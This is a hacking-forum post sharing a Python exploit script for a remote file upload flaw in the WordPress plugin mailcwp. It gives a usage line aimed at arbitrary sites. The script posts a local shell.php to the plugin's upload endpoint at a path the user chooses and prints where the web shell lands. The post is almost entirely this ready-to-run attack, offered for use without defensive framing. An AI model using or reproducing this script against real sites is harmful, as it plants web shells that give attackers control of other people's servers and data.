Wordpress Exploit Mailcwp

Another beautiful code made by my friend Ne0! Use: python mailc.py www.site.com #!/usr/bin/python import requests import sys import os def c(): if os.name == "nt"...

Another beautiful code made by my friend Ne0!

Use: python mailc.py www.site.com

Kod:
#!/usr/bin/python

import requests
import sys
import os

def c():

    if os.name == "nt":
        os.system('cls')
    else:
        os.system('clear')
c()


print "\t\t\t"+"-" * 50
print "\t\t\t"+"| Remote file upload vulnerability in mailcwp"
print "\t\t\t"+"| Coded By Ne0-h4ck3r"
print "\t\t\t"+"| URL: http://blackcoder.info/"
print "\t\t\t"+"| Use: python mailc.py www.site.com"
print "\t\t\t"+"-" * 50

def main():
    try:
        site = sys.argv[1]
        #print ""
        #site = raw_input('Enter Target Domain: ')
        print ""
        path = raw_input('Enter Valid Path To Upload Shell: ')
        print ""
        if path.startswith('/'):
            pass
        else:
           
            print "[~] Enter Valid Path"
            print ""
            sys.exit()
        uagent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
        url = "http://"+site+"wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir="+path
        files = {'file': open("shell.php", 'rb')}
        data = requests.post(url, files=files, headers=uagent)

        box = data.status_code
       
        if box == 200:
            print "[+] Domain: " + site
            print "[+] Shell Path: " +path+"1-shell.php"
            print ""

        else:
            print ""
            print "Not Vulnerable"
            print ""

    except Exception, e:
        print e
main()
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
132,915Konular
3,284,125Mesajlar
318,192Kullanıcılar
furkanx0727Son Üye
Üst Alt